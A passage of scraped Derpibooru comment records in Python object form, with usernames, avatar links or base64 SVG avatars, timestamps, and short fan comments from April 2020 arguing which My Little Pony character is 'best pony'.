tzinfo=datetime.timezone.utc), image_id=2317196, edit_reason=None, edited_at=None, updated_at=datetime.datetime(2020, 4, 8, 16, 57, 41, tzinfo=datetime.timezone.utc), user_id=454945), Comment(author='*Rainbow Dash*', 
avatar='https://derpicdn.net/avatars/2014/10/18/19_16_04_432_soarindash_by_anarchemitis_d6rvvty.png', body='"@Background Pony #2AFB":/images/2316923#comment_8921241\r\nwell because shes best pony! thats why :)', id=8921300, created_at=datetime.datetime(2020, 4, 8, 4, 15, 12, tzinfo=datetime.timezone.utc), image_id=2316923, edit_reason=None, edited_at=None, updated_at=datetime.datetime(2020, 4, 8, 4, 15, 12, tzinfo=datetime.timezone.utc), user_id=217509), Comment(author='Sugar Morning', avatar='https://derpicdn.net/avatars/2017/10/31/2284605dd2290564e132379.png', body='"@Sea Swirl is best pony":/images/2315826#comment_8919797\r\nI won\'t charge more for background or bunny ears, you can ask me if you want them to have background or bunny ears :3 and yes you get versions without additional charges.\r\n\r\nThe additional charges are only for merging 2 animation into one (you can commission 2 ponies without merging them if you can merge it yourself of course :P)\r\n\r\nSo for 75$ you\'ll get one merged animation and 2 separate ponies jumping alone.', id=8919839, created_at=datetime.datetime(2020, 4, 7, 14, 52, 39, tzinfo=datetime.timezone.utc), image_id=2315826, edit_reason=None, edited_at=None, updated_at=datetime.datetime(2020, 4, 7, 14, 52, 39, tzinfo=datetime.timezone.utc), user_id=423165), Comment(author='GrapefruitFace', avatar='https://derpicdn.net/avatars/2020/3/4/158335243352111503166980.png', body='Trixie Lulamoon! 
All hail best pony <3', id=8917815, created_at=datetime.datetime(2020, 4, 6, 18, 30, 17, tzinfo=datetime.timezone.utc), image_id=2315620, edit_reason=None, edited_at=None, updated_at=datetime.datetime(2020, 4, 6, 18, 30, 17, tzinfo=datetime.timezone.utc), user_id=421796), Comment(author='Background Pony #8D6F', avatar='data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIxMjUiIGhlaWdodD0iMTI1IiB2aWV3Qm94PSIwIDAgMTI1IDEyNSIgY2xhc3M9ImF2YXRhci1zdmciPjxyZWN0IHdpZHRoPSIxMjUiIGhlaWdodD0iMTI1IiBmaWxsPSIjYzZkZmYyIi8+PHBhdGggZD0iTTE1LjQ1NiAxMDkuMTVDMTIuMDIgOTcuODA1IDYuNDQgOTUuMDM2LS43OTQgOTguODl2MTkuMTAyYzUuMTMtMTAuMDkgMTAuMjYzLTguMjk0IDE1LjM5NS01LjciIGZpbGw9IiNBMjhGNDgiLz48cGF0aCBkPSJNNzMuMDU0IDI0LjQ2YzI1Ljg4NiAwIDM5LjE0NCAyNi4zOSAyOC45MTYgNDQuOTUgMS4yNjMuMzggNC45MjQgMi4yNzQgMy40MSA0LjgtMS41MTYgMi41MjUtNy41NzcgMTYuMjg4LTI3Ljc4IDE0Ljc3My0xLjAxIDYuNDQtLjMzIDEyLjYxMyAxLjY0MiAyMi44NTQgMS4zOSA3LjIyNC0uNjMyIDE0LjY0OC0uNjMyIDE0LjY0OHMtNDcuNzg1LjIxNi03My43NC0uMTI3Yy0xLjg4My02LjM4NyA4Ljk2NC0yNS43NiAyMC44MzMtMjQuNzQ4IDE1LjY3NCAxLjMzNCAxOS4xOTMgMS42NCAyMS41OTItMi4wMiAyLjQtMy42NjIgMC0yMy4yMzQtMy41MzUtMzAuODEtMy41MzYtNy41NzctNy44My00MC43ODUgMjkuMjk0LTQ0LjMyeiIgZmlsbD0iIzUzNzc1RCIvPjxwYXRoIGQ9Ik01Ni4xNiAyOC4wNDRjMTcuMzQ0LTEzLjIyIDU2LjI1OC0yOS4yMDUgNjMuMDYzIDMuODQ3IDIuNTIgMTIuMjQ4LjIyNSAxMy43Ni02LjE4OCAxNy45MS03Ljc5IDUuMDQ1LTE3LjM4Ni0xLjM3LTE1LjA1LTYuNjYyLTguNjUyIDcuNzA3LTE1LjQ4NCAxMC42MjQtMjMuMTIgOS44NS05LjE2Ny0uOTI3LTYuNDM3LTYuNzYtMi40MTctOS44NzIgMi40MzctMS44ODcgNS4wOC0zLjU3IDkuNDM2LTUuNzYtNy45NDIgMi41NS0xMy45OTIgMS45NzQtMTkuMjgyLTMuMzRsLTEwLjk0NyA1LjU1LjAxNSAxMS41NDJDNTMuMyA2NC4xNyA2Mi43NTggODAuODEgNjMuOTEyIDkzLjQyYy43MiA3Ljg3Ni01LjUzMiA2LjYzNy04LjY1IDEuNDI1IDEuODQ3IDUuNTgyIDMuNTkyIDkuODkyIDMuNDgzIDE1Ljg5LS4xMyA3LjE3OC04LjM4NiAxMS41NC0xMi4wNDcgMS4wOTgtNy41MDUtMjEuNDA1LTEyLjk2NS01MS45Ny0uOTczLTc1LjN6IiBmaWxsPSIjQTI4RjQ4Ii8+PHBhdGggZD0iTTY0LjM0MiAzNS41N3MzLjI4My04LjA4LTcuMzI0LTE5LjMxOGMtMS43NjgtMS43NjgtMy4wMy0yLjI3My00LjY3Mi0uNzU4LTEuNjQgMS41MTUtMTcuM
DQ2IDE2LjAzNi4yNTMgMzguMjYuNTA0LTIuNCAxLjEzNS05LjU5NyAxLjEzNS05LjU5N3oiIGZpbGw9IiM1Mzc3NUQiLz48L3N2Zz4=', body="Twilight's wondering if she truly is best pony (because she totally is)", id=8917628, created_at=datetime.datetime(2020, 4, 6, 16, 13, 9, tzinfo=datetime.timezone.utc), image_id=2315464, edit_reason=None, edited_at=None, updated_at=datetime.datetime(2020, 4, 6, 16, 13, 9, tzinfo=datetime.timezone.utc), user_id=None), Comment(author='AzriBoss', avatar='data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIxMjUiIGhlaWdodD0iMTI1IiB2aWV3Qm94PSIwIDAgMTI1IDEyNSIgY2xhc3M9ImF2YXRhci1zdmciPjxyZWN0IHdpZHRoPSIxMjUiIGhlaWdodD0iMTI1IiBmaWxsPSIjYzZkZmYyIi8+PHBhdGggZD0iTTE1LjQ1NiAxMDkuMTVDMTIuMDIgOTcuODA1IDYuNDQgOTUuMDM2LS43OTQgOTguODl2MTkuMTAyYzUuMTMtMTAuMDkgMTAuMjYzLTguMjk0IDE1LjM5NS01LjciIGZpbGw9IiNDODc0OTYiLz48cGF0aCBkPSJNNzMuMDU0IDI0LjQ2YzI1Ljg4NiAwIDM5LjE0NCAyNi4zOSAyOC45MTYgNDQuOTUgMS4yNjMuMzggNC45MjQgMi4yNzQgMy40MSA0LjgtMS41MTYgMi41MjUtNy41NzcgMTYuMjg4LTI3Ljc4IDE0Ljc3My0xLjAxIDYuNDQtLjMzIDEyLjYxMyAxLjY0MiAyMi44NTQgMS4zOSA3LjIyNC0uNjMyIDE0LjY0OC0uNjMyIDE0LjY0OHMtNDcuNzg1LjIxNi03My43NC0uMTI3Yy0xLjg4My02LjM4NyA4Ljk2NC0yNS43NiAyMC44MzMtMjQuNzQ4IDE1LjY3NCAxLjMzNCAxOS4xOTMgMS42NCAyMS41OTItMi4wMiAyLjQtMy42NjIgMC0yMy4yMzQtMy41MzUtMzAuODEtMy41MzYtNy41NzctNy44My00MC43ODUgMjkuMjk0LTQ0LjMyeiIgZmlsbD0iIzlFQTM1NSIvPjxwYXRoIGQ9Ik01Ni4xNiAyOC4wNDRjMTcuMzQ0LTEzLjIyIDU2LjI1OC0yOS4yMDUgNjMuMDYzIDMuODQ3IDIuNTIgMTIuMjQ4LjIyNSAxMy43Ni02LjE4OCAxNy45MS03Ljc5IDUuMDQ1LTE3LjM4Ni0xLjM3LTE1LjA1LTYuNjYyLTguNjUyIDcuNzA3LTE1LjQ4NCAxMC42MjQtMjMuMTIgOS44NS05LjE2Ny0uOTI3LTYuNDM3LTYuNzYtMi40MTctOS44NzIgMi40MzctMS44ODcgNS4wOC0zLjU3IDkuNDM2LTUuNzYtNy45NDIgMi41NS0xMy45OTIgMS45NzQtMTkuMjgyLTMuMzRsLTEwLjk0NyA1LjU1LjAxNSAxMS41NDJDNTMuMyA2NC4xNyA2Mi43NTggODAuODEgNjMuOTEyIDkzLjQyYy43MiA3Ljg3Ni01LjUzMiA2LjYzNy04LjY1IDEuNDI1IDEuODQ3IDUuNTgyIDMuNTkyIDkuODkyIDMuNDgzIDE1Ljg5LS4xMyA3LjE3OC04LjM4NiAxMS41NC0xMi4wNDcgMS4wOTgtNy41MDUtMjEuNDA1LTEyLjk2NS01MS45Ny0uOTczLTc1LjN6IiBmaWxs
PSIjQzg3NDk2Ii8+PHBhdGggZD0iTTQzLjI2NyAxMDcuMzI0cy02LjgyNS0xNC4xMzctNy42NC0zMC4xNjZjLS44MTctMTYuMDMtNC4xOTctMzEuNDY4LTEwLjU1LTQwLjY4OC02LjM1NC05LjIyLTEzLjI3Mi05LjczLTExLjk5Ny0zLjk4MiAxLjI3NSA1Ljc0OCAxMS4xMjMgMzMuMDE2IDEyLjEyOCAzNS45NTRDMjMuMDQyIDY1LjY0OCA3LjAzOCA0MS4xMS0uNDMgMzcuMjIyYy03LjQ3LTMuODg2LTguOTYuMzQ2LTYuODkyIDUuODg1IDIuMDY4IDUuNTQgMTguNTA3IDMwLjg0NCAyMC44ODYgMzMuNTAyLTIuNzM4LTEuNjg1LTEyLjI1Ni05LjAzNi0xNi45OTctOC45OTYtNC43NDIuMDQtNC45MSA1LjM2Ni0yLjYxNyA4LjUyNiAyLjI5MiAzLjE2MiAyMC45MTIgMTkuMTczIDI1LjE1IDIwLjk0NS01LjM1LjI4LTEwLjM4NCAxLjk5Ni05LjE4NiA2LjAwNCAxLjIgNC4wMDYgMTEuMzg0IDE0LjA2MyAyOC41MyAxMi4zNzcgMi41NzYtMi44MzQgNC44MjMtOC4xNDMgNC44MjMtOC4xNDN6IiBmaWxsPSIjOUVBMzU1Ii8+PHBhdGggZD0iTTY0LjM0MiAzNS41N3MzLjI4My04LjA4LTcuMzI0LTE5LjMxOGMtMS43NjgtMS43NjgtMy4wMy0yLjI3My00LjY3Mi0uNzU4LTEuNjQgMS41MTUtMTcuMDQ2IDE2LjAzNi4yNTMgMzguMjYuNTA0LTIuNCAxLjEzNS05LjU5NyAxLjEzNS05LjU5N3oiIGZpbGw9IiM5RUEzNTUiLz48L3N2Zz4=', body='Best pony', id=8917599, created_at=datetime.datetime(2020, 4, 6, 15, 44, 4, tzinfo=datetime.timezone.utc), image_id=2315424, edit_reason=None, edited_at=None, updated_at=datetime.datetime(2020, 4, 6, 15, 44, 4, tzinfo=datetime.timezone.utc), user_id=425326), Comment(author="Soarin's Beeyatch", avatar='https://derpicdn.net/avatars/2020/4/6/1586209669826494025012921.png', body='Wonderful case study for best pony~', id=8917183, created_at=datetime.datetime(2020, 4, 6, 10, 33, 37, tzinfo=datetime.timezone.utc), image_id=2315305, edit_reason=None, edited_at=None, updated_at=datetime.datetime(2020, 4, 6, 10, 33, 37, tzinfo=datetime.timezone.utc), user_id=492014), Comment(author='Background Pony #257E', 
avatar='data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIxMjUiIGhlaWdodD0iMTI1IiB2aWV3Qm94PSIwIDAgMTI1IDEyNSIgY2xhc3M9ImF2YXRhci1zdmciPjxyZWN0IHdpZHRoPSIxMjUiIGhlaWdodD0iMTI1IiBmaWxsPSIjYzZkZmYyIi8+PHBhdGggZD0iTTE1LjQ1NiAxMDkuMTVDMTIuMDIgOTcuODA1IDYuNDQgOTUuMDM2LS43OTQgOTguODl2MTkuMTAyYzUuMTMtMTAuMDkgMTAuMjYzLTguMjk0IDE1LjM5NS01LjciIGZpbGw9IiNBMTg3QkUiLz48cGF0aCBkPSJNNzMuMDU0IDI0LjQ2YzI1Ljg4NiAwIDM5LjE0NCAyNi4zOSAyOC45MTYgNDQuOTUgMS4yNjMuMzggNC45MjQgMi4yNzQgMy40MSA0LjgtMS41MTYgMi41MjUtNy41NzcgMTYuMjg4LTI3Ljc4IDE0Ljc3My0xLjAxIDYuNDQtLjMzIDEyLjYxMyAxLjY0MiAyMi44NTQgMS4zOSA3LjIyNC0uNjMyIDE0LjY0OC0uNjMyIDE0LjY0OHMtNDcuNzg1LjIxNi03My43NC0uMTI3Yy0xLjg4My02LjM4NyA4Ljk2NC0yNS43NiAyMC44MzMtMjQuNzQ4IDE1LjY3NCAxLjMzNCAxOS4xOTMgMS42NCAyMS41OTItMi4wMiAyLjQtMy42NjIgMC0yMy4yMzQtMy41MzUtMzAuODEtMy41MzYtNy41NzctNy44My00MC43ODUgMjkuMjk0LTQ0LjMyeiIgZmlsbD0iIzgxNzNBOSIvPjxwYXRoIGQ9Ik01Ni4xNiAyOC4wNDRjMTcuMzQ0LTEzLjIyIDU2LjI1OC0yOS4yMDUgNjMuMDYzIDMuODQ3IDIuNTIgMTIuMjQ4LjIyNSAxMy43Ni02LjE4OCAxNy45MS03Ljc5IDUuMDQ1LTE3LjM4Ni0xLjM3LTE1LjA1LTYuNjYyLTguNjUyIDcuNzA3LTE1LjQ4NCAxMC42MjQtMjMuMTIgOS44NS05LjE2Ny0uOTI3LTYuNDM3LTYuNzYtMi40MTctOS44NzIgMi40MzctMS44ODcgNS4wOC0zLjU3IDkuNDM2LTUuNzYtNy45NDIgMi41NS0xMy45OTIgMS45NzQtMTkuMjgyLTMuMzRsLTEwLjk0NyA1LjU1LjAxNSAxMS41NDJDNTMuMyA2NC4xNyA2Mi43NTggODAuODEgNjMuOTEyIDkzLjQyYy43MiA3Ljg3Ni01LjUzMiA2LjYzNy04LjY1IDEuNDI1IDEuODQ3IDUuNTgyIDMuNTkyIDkuODkyIDMuNDgzIDE1Ljg5LS4xMyA3LjE3OC04LjM4NiAxMS41NC0xMi4wNDcgMS4wOTgtNy41MDUtMjEuNDA1LTEyLjk2NS01MS45Ny0uOTczLTc1LjN6IiBmaWxsPSIjQTE4N0JFIi8+PHBhdGggZD0iTTQzLjI2NyAxMDcuMzI0cy02LjgyNS0xNC4xMzctNy42NC0zMC4xNjZjLS44MTctMTYuMDMtNC4xOTctMzEuNDY4LTEwLjU1LTQwLjY4OC02LjM1NC05LjIyLTEzLjI3Mi05LjczLTExLjk5Ny0zLjk4MiAxLjI3NSA1Ljc0OCAxMS4xMjMgMzMuMDE2IDEyLjEyOCAzNS45NTRDMjMuMDQyIDY1LjY0OCA3LjAzOCA0MS4xMS0uNDMgMzcuMjIyYy03LjQ3LTMuODg2LTguOTYuMzQ2LTYuODkyIDUuODg1IDIuMDY4IDUuNTQgMTguNTA3IDMwLjg0NCAyMC44ODYgMzMuNTAyLTIuNzM4LTEuNjg1LTEyLjI1Ni05LjAzNi0xNi45OTctOC45OTYtNC43NDIuMDQtNC45MSA1LjM2Ni
0yLjYxNyA4LjUyNiAyLjI5MiAzLjE2MiAyMC45MTIgMTkuMTczIDI1LjE1IDIwLjk0NS01LjM1LjI4LTEwLjM4NCAxLjk5Ni05LjE4NiA2LjAwNCAxLjIgNC4wMDYgMTEuMzg0IDE0LjA2MyAyOC41MyAxMi4zNzcgMi41NzYtMi44MzQgNC44MjMtOC4xNDMgNC44MjMtOC4xNDN6IiBmaWxsPSIjODE3M0E5Ii8+PHBhdGggZD0iTTY0LjM0MiAzNS41N3MzLjI4My04LjA4LTcuMzI0LTE5LjMxOGMtMS43NjgtMS43NjgtMy4wMy0yLjI3My00LjY3Mi0uNzU4LTEuNjQgMS41MTUtMTcuMDQ2IDE2LjAzNi4yNTMgMzguMjYuNTA0LTIuNCAxLjEzNS05LjU5NyAxLjEzNS05LjU5N3oiIGZpbGw9IiM4MTczQTkiLz48L3N2Zz4=', body='Best pony', id=8915817, created_at=datetime.datetime(2020, 4, 5, 21, 11, 46, tzinfo=datetime.timezone.utc), image_id=1981478, edit_reason=None, edited_at=None, updated_at=datetime.datetime(2020, 4, 5, 21, 11, 46, tzinfo=datetime.timezone.utc), user_id=None), Comment(author='Background Pony #B56E', avatar='data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIxMjUiIGhlaWdodD0iMTI1IiB2aWV3Qm94PSIwIDAgMTI1IDEyNSIgY2xhc3M9ImF2YXRhci1zdmciPjxyZWN0IHdpZHRoPSIxMjUiIGhlaWdodD0iMTI1IiBmaWxsPSIjYzZkZmYyIi8+PHBhdGggZD0iTTE1LjQ1NiAxMDkuMTVDMTIuMDIgOTcuODA1IDYuNDQgOTUuMDM2LS43OTQgOTguODl2MTkuMTAyYzUuMTMtMTAuMDkgMTAuMjYzLTguMjk0IDE1LjM5NS01LjciIGZpbGw9IiNBNTUwNTMiLz48cGF0aCBkPSJNNzMuMDU0IDI0LjQ2YzI1Ljg4NiAwIDM5LjE0NCAyNi4zOSAyOC45MTYgNDQuOTUgMS4yNjMuMzggNC45MjQgMi4yNzQgMy40MSA0LjgtMS41MTYgMi41MjUtNy41NzcgMTYuMjg4LTI3Ljc4IDE0Ljc3My0xLjAxIDYuNDQtLjMzIDEyLjYxMyAxLjY0MiAyMi44NTQgMS4zOSA3LjIyNC0uNjMyIDE0LjY0OC0uNjMyIDE0LjY0OHMtNDcuNzg1LjIxNi03My43NC0uMTI3Yy0xLjg4My02LjM4NyA4Ljk2NC0yNS43NiAyMC44MzMtMjQuNzQ4IDE1LjY3NCAxLjMzNCAxOS4xOTMgMS42NCAyMS41OTItMi4wMiAyLjQtMy42NjIgMC0yMy4yMzQtMy41MzUtMzAuODEtMy41MzYtNy41NzctNy44My00MC43ODUgMjkuMjk0LTQ0LjMyeiIgZmlsbD0iIzY5OEVDMiIvPjxwYXRoIGQ9Ik02My42MiAzNS4wMjVjMTEuNTYyLjczNiAxOS43OTggMy40MzQgMzQuNTY3IDExLjU5NyAyNS4zODMtMTIuMjQzIDE2LjAxLTM1LjUyNC0uNzYzLTM5Ljk5LTE1LjYyNS00LjE2LTI1LjgzLTEuNzU1LTM3LTUuNTY1IDEuOTU2IDQuMTQgNC41NjQgOC4zNDggOCAxMC4zMjItMTguODI2LS4xOC0yOC4xMTMtMy42NzYtNDIuNzUtNy4wNSAyLjk1IDUuMjkgOS45OTQgMTEuNTIgMTMuMjUgMTMuODg0LTEyLjA4MyA1
LjA5NC0yMC45MTYtLjA3Ni0zMy0yLjE1IDMuMzMzIDUuODIzIDcuMDQ4IDExLjE5IDEyLjI1IDE0Ljc4My01IDE2LjM0MyAxOS45MTYgMzcuMTk3IDI5Ljc4NyA1Ny4xNCAyLjctMTIuODE1IDQuNzYtMzAuNzkyIDMuMjktNDMuNjA3eiIgZmlsbD0iI0E1NTA1MyIvPjxwYXRoIGQ9Ik05Mi43NTIgMzYuODM0czkuMDkyLTE5LjU3MiA2LjA2LTIyLjczYy0zLjAzLTMuMTU2LTE1LjI3NyAxMS40OTItMTYuOTIgMTYuNTQyIDIuMDIuNTA1IDguMDgyIDIuMjczIDEwLjg2IDYuMTg4eiIgZmlsbD0iIzY5OEVDMiIvPjxwYXRoIGQ9Ik02NC4zNDIgMzUuNTdzMy4yODMtOC4wOC03LjMyNC0xOS4zMThjLTEuNzY4LTEuNzY4LTMuMDMtMi4yNzMtNC42NzItLjc1OC0xLjY0IDEuNTE1LTE3LjA0NiAxNi4wMzYuMjUzIDM4LjI2LjUwNC0yLjQgMS4xMzUtOS41OTcgMS4xMzUtOS41OTd6IiBmaWxsPSIjNjk4RUMyIi8+PC9zdmc+', body='This is my dream right here, having a relaxing experience at the spa with best pony', id=8915809, created_at=datetime.datetime(2020, 4, 5, 21, 6, 24, tzinfo=datetime.timezone.utc), image_id=2314905, edit_reason=None, edited_at=None, updated_at=datetime.datetime(2020, 4, 5, 21, 6, 24, tzinfo=datetime.timezone.utc), user_id=None), Comment(author='Background Pony #A77B', avatar='data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIxMjUiIGhlaWdodD0iMTI1IiB2aWV3Qm94PSIwIDAgMTI1IDEyNSIgY2xhc3M9ImF2YXRhci1zdmciPjxyZWN0IHdpZHRoPSIxMjUiIGhlaWdodD0iMTI1IiBmaWxsPSIjYzZkZmYyIi8+PHBhdGggZD0iTTE1LjQ1NiAxMDkuMTVDMTIuMDIgOTcuODA1IDYuNDQgOTUuMDM2LS43OTQgOTguODl2MTkuMTAyYzUuMTMtMTAuMDkgMTAuMjYzLTguMjk0IDE1LjM5NS01LjciIGZpbGw9IiM4RThDNzEiLz48cGF0aCBkPSJNNzMuMDU0IDI0LjQ2YzI1Ljg4NiAwIDM5LjE0NCAyNi4zOSAyOC45MTYgNDQuOTUgMS4yNjMuMzggNC45MjQgMi4yNzQgMy40MSA0LjgtMS41MTYgMi41MjUtNy41NzcgMTYuMjg4LTI3Ljc4IDE0Ljc3My0xLjAxIDYuNDQtLjMzIDEyLjYxMyAxLjY0MiAyMi44NTQgMS4zOSA3LjIyNC0uNjMyIDE0LjY0OC0uNjMyIDE0LjY0OHMtNDcuNzg1LjIxNi03My43NC0uMTI3Yy0xLjg4My02LjM4NyA4Ljk2NC0yNS43NiAyMC44MzMtMjQuNzQ4IDE1LjY3NCAxLjMzNCAxOS4xOTMgMS42NCAyMS41OTItMi4wMiAyLjQtMy42NjIgMC0yMy4yMzQtMy41MzUtMzAuODEtMy41MzYtNy41NzctNy44My00MC43ODUgMjkuMjk0LTQ0LjMyeiIgZmlsbD0iIzcyOTc5RiIvPjxwYXRoIGQ9Ik01NC4zIDE5LjZjMTkuMTktMTQuOTQ3IDQ0LjQ5LTEyLjY4IDYyLjM4Ni00LjAxNCA0LjY5NyAyLjI3NSAxMS44NT
cgMTIuMS0zLjU4MyAxMi4wNSAxMC43NDYgMy44OTMgMTEuODcgMjIuNTYyIDYuNzAyIDI0LjU1OC01Ljk1NiAyLjMtMTAuNzEtNy40MjItMTAuMjI3LTEzLjYzNy0yLjUyMiAxMS4yMTUtOC4zNiAyMi44OTMtMTMuODQgMTguMzEtNC41OTctMy44NDYtNC4xOTItOC42MTctLjk1LTEzLjc2NC01LjY5NCA0LjcyNC0xMS4yOTggNy44NzItMTYuOTkyIDMuNTY2LTUuNzcgMy4yMDQtMTAuNzc2IDguNjI1LTE3LjE4MiA1LjkzLTcuOTM1LTMuMzQtMS4wMjQtMTMuNDY4IDMuOTc2LTE3LjE0My03LjMwOC0uMzE0LTkuODE1IDMuNDU0LTE0LjQzMiAxMi44OTUgMi45NjMgMTcuODUgMTkuNDM4IDMyLjIwMiAxOC41MTcgNDkuMjUtLjUzNiA5LjkxNi00LjY4OCAxMC44OC01Ljg1MiAyLjUxIDEuNjk2IDI1LjI1My04LjYzNCAyNC44MTYtOS4zNTYgMTMuOTA0LTkuNDQ3IDE2LjItMTMuNjI1IDQuNTEtMTAuOTMtNC4xODMgMi4wNTQtNi42MjggNC4wMy0xMi4xNiA2LjQyNS0xNi43NzctMi41NDcgNy42Ni03LjMzMyA1LjIzMi04LjU4MyA0LjQzLTIuODU0LTEuODM0LS44NTUtMTIuMzAyIDQuMDM1LTE5LjMzIDguMy0xMS45My0yMy43My0zMC4xNzIgMi40Ny01My4xOTciIGZpbGw9IiM4RThDNzEiLz48cGF0aCBkPSJNNDMuMjY3IDEwNy4zMjRzLTYuODI1LTE0LjEzNy03LjY0LTMwLjE2NmMtLjgxNy0xNi4wMy00LjE5Ny0zMS40NjgtMTAuNTUtNDAuNjg4LTYuMzU0LTkuMjItMTMuMjcyLTkuNzMtMTEuOTk3LTMuOTgyIDEuMjc1IDUuNzQ4IDExLjEyMyAzMy4wMTYgMTIuMTI4IDM1Ljk1NEMyMy4wNDIgNjUuNjQ4IDcuMDM4IDQxLjExLS40MyAzNy4yMjJjLTcuNDctMy44ODYtOC45Ni4zNDYtNi44OTIgNS44ODUgMi4wNjggNS41NCAxOC41MDcgMzAuODQ0IDIwLjg4NiAzMy41MDItMi43MzgtMS42ODUtMTIuMjU2LTkuMDM2LTE2Ljk5Ny04Ljk5Ni00Ljc0Mi4wNC00LjkxIDUuMzY2LTIuNjE3IDguNTI2IDIuMjkyIDMuMTYyIDIwLjkxMiAxOS4xNzMgMjUuMTUgMjAuOTQ1LTUuMzUuMjgtMTAuMzg0IDEuOTk2LTkuMTg2IDYuMDA0IDEuMiA0LjAwNiAxMS4zODQgMTQuMDYzIDI4LjUzIDEyLjM3NyAyLjU3Ni0yLjgzNCA0LjgyMy04LjE0MyA0LjgyMy04LjE0M3oiIGZpbGw9IiM3Mjk3OUYiLz48cGF0aCBkPSJNNjQuMzQyIDM1LjU3czMuMjgzLTguMDgtNy4zMjQtMTkuMzE4Yy0xLjc2OC0xLjc2OC0zLjAzLTIuMjczLTQuNjcyLS43NTgtMS42NCAxLjUxNS0xNy4wNDYgMTYuMDM2LjI1MyAzOC4yNi41MDQtMi40IDEuMTM1LTkuNTk3IDEuMTM1LTkuNTk3eiIgZmlsbD0iIzcyOTc5RiIvPjwvc3ZnPg==', body='Portu calez > Portugal\r\n"Port of the grail"\r\nGuys, Dash found the Holy Grail. Templars confirmed. 
Rainbow Dash is best pony.', id=8915112, created_at=datetime.datetime(2020, 4, 5, 14, 35, 8, tzinfo=datetime.timezone.utc), image_id=2314697, edit_reason=None, edited_at=None, updated_at=datetime.datetime(2020, 4, 5, 14, 35, 8, tzinfo=datetime.timezone.utc), user_id=None), Comment(author='Doeknight Sprinkles', avatar='https://derpicdn.net/avatars/2020/1/7/1578373965192687025633191.gif', body='I love this! Fluttershy is best pony pred! We need more of this! Thank you opti!', id=8914496, created_at=datetime.datetime(2020, 4, 5, 5, 37, 45, tzinfo=datetime.timezone.utc), image_id=2314498, edit_reason=None, edited_at=None, updated_at=datetime.datetime(2020, 4, 5, 5, 37, 45, tzinfo=datetime.timezone.utc), user_id=450458), Comment(author='Twidorable', avatar='https://derpicdn.net/avatars/2012/6/4/0098cb63fb856eb401.jpg', body='Coloratura is still Best Pony', id=8912304, created_at=datetime.datetime(2020, 4, 4, 5, 16, 46, tzinfo=datetime.timezone.utc), image_id=2312766, edit_reason=None, edited_at=None, updated_at=datetime.datetime(2020, 4, 4, 5, 16, 46, tzinfo=datetime.timezone.utc), user_id=211668), Comment(author='ABronyAccount', avatar='https://derpicdn.net/avatars/2016/03/10/03_39_28_295_CeilingSpikeAvTransparent_125_by_shelltoontv_d3czifb.png', body='"@Rainbow Dash is Best Pony":/images/2308194#comment_8911421\r\nAt least they didn\'t make the site into a Rainbow Factory reference or something awful like that! 
^_~', id=8911579, created_at=datetime.datetime(2020, 4, 3, 22, 41, 32, tzinfo=datetime.timezone.utc), image_id=2308194, edit_reason=None, edited_at=None, updated_at=datetime.datetime(2020, 4, 3, 22, 41, 32, tzinfo=datetime.timezone.utc), user_id=341159), Comment(author='Beau Skunky', avatar='https://derpicdn.net/avatars/2012/7/22/045f57f5b8676bad34.jpg', body='"@FlutterButterButt":/images/2313389#comment_8911503\r\nAnd he\'s best pony.', id=8911526, created_at=datetime.datetime(2020, 4, 3, 22, 13, 51, tzinfo=datetime.timezone.utc), image_id=2313389, edit_reason=None, edited_at=None, updated_at=datetime.datetime(2020, 4, 3, 22, 13, 51, tzinfo=datetime.timezone.utc), user_id=222513), Comment(author='radostt', avatar='https://derpicdn.net/avatars/2020/4/6/15861317880504380165861956.jpg', body='Because making mistakes can lead to all kinds of shenanigans. Plus her in the moment writing is more relate able. Shes just the best. Her writing can stand for itself. Plus she has one of the best pony designs in the show, and shes super strong. 
Shes also a leader.', id=8911129, created_at=datetime.datetime(2020, 4, 3, 19, 13, 35, tzinfo=datetime.timezone.utc), image_id=2042365, edit_reason=None, edited_at=None, updated_at=datetime.datetime(2020, 4, 3, 19, 13, 35, tzinfo=datetime.timezone.utc), user_id=357245), Comment(author='radostt', avatar='https://derpicdn.net/avatars/2020/4/6/15861317880504380165861956.jpg', body='3 best ponies in the show.', id=8911122, created_at=datetime.datetime(2020, 4, 3, 19, 8, 52, tzinfo=datetime.timezone.utc), image_id=2053410, edit_reason=None, edited_at=None, updated_at=datetime.datetime(2020, 4, 3, 19, 8, 52, tzinfo=datetime.timezone.utc), user_id=357245), Comment(author='Background Pony #F783', avatar='data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIxMjUiIGhlaWdodD0iMTI1IiB2aWV3Qm94PSIwIDAgMTI1IDEyNSIgY2xhc3M9ImF2YXRhci1zdmciPjxyZWN0IHdpZHRoPSIxMjUiIGhlaWdodD0iMTI1IiBmaWxsPSIjYzZkZmYyIi8+PHBhdGggZD0iTTE1LjQ1NiAxMDkuMTVDMTIuMDIgOTcuODA1IDYuNDQgOTUuMDM2LS43OTQgOTguODl2MTkuMTAyYzUuMTMtMTAuMDkgMTAuMjYzLTguMjk0IDE1LjM5NS01LjciIGZpbGw9IiM0QjZCNzUiLz48cGF0aCBkPSJNNzMuMDU0IDI0LjQ2YzI1Ljg4NiAwIDM5LjE0NCAyNi4zOSAyOC45MTYgNDQuOTUgMS4yNjMuMzggNC45MjQgMi4yNzQgMy40MSA0LjgtMS41MTYgMi41MjUtNy41NzcgMTYuMjg4LTI3Ljc4IDE0Ljc3My0xLjAxIDYuNDQtLjMzIDEyLjYxMyAxLjY0MiAyMi44NTQgMS4zOSA3LjIyNC0uNjMyIDE0LjY0OC0uNjMyIDE0LjY0OHMtNDcuNzg1LjIxNi03My43NC0uMTI3Yy0xLjg4My02LjM4NyA4Ljk2NC0yNS43NiAyMC44MzMtMjQuNzQ4IDE1LjY3NCAxLjMzNCAxOS4xOTMgMS42NCAyMS41OTItMi4wMiAyLjQtMy42NjIgMC0yMy4yMzQtMy41MzUtMzAuODEtMy41MzYtNy41NzctNy